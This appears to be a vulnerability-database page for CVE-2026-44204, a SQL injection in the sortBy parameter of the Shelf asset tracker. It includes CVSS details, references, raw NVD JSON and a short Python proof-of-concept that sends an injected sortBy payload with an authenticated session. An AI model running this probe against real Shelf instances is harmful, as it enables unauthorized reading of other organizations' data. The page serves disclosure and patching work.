CVE-2026-44204

Description

Shelf is a platform for tracking physical assets. From 1.12 to before 1.20.1, a SQL injection vulnerability in the sortBy query parameter on the /assets route allows any authenticated user (any role) to execute arbitrary SQL and read data from any table in the database, including data belonging to other organizations. This vulnerability is fixed in 1.20.1.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Shelf >= 1.12, < 1.20.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = "https://target-shelf-instance.com/assets"

# Authenticated session cookie (Required)
cookies = {
    "shelf_session": "valid_session_token_here"
}

# Malicious payload for sortBy parameter
# Attempting to extract database version via blind injection or error based
payload = "(SELECT CASE WHEN (1=1) THEN id ELSE 1/0 END)" 

params = {
    "sortBy": payload
}

try:
    response = requests.get(url, params=params, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("Request sent successfully. Check response for SQL errors or timing differences.")
        print(response.text[:200]) # Print partial response
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44204
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44204
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44204/
[4] VulDB https://vuldb.com/cve/CVE-2026-44204
[5] https://github.com/Shelf-nu/shelf.nu/commit/5d35c15856dbf267fab4dccafd077ee7a6fa6f40
[6] https://github.com/Shelf-nu/shelf.nu/security/advisories/GHSA-69xv-wmgg-3qp3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44204", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:29.883", "lastModified": "2026-05-12T18:17:29.883", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shelf is a platform for tracking physical assets. From 1.12 to before 1.20.1, a SQL injection vulnerability in the sortBy query parameter on the /assets route allows any authenticated user (any role) to execute arbitrary SQL and read data from any table in the database, including data belonging to other organizations. This vulnerability is fixed in 1.20.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/Shelf-nu/shelf.nu/commit/5d35c15856dbf267fab4dccafd077ee7a6fa6f40", "source": "[email protected]"}, {"url": "https://github.com/Shelf-nu/shelf.nu/security/advisories/GHSA-69xv-wmgg-3qp3", "source": "[email protected]"}]}}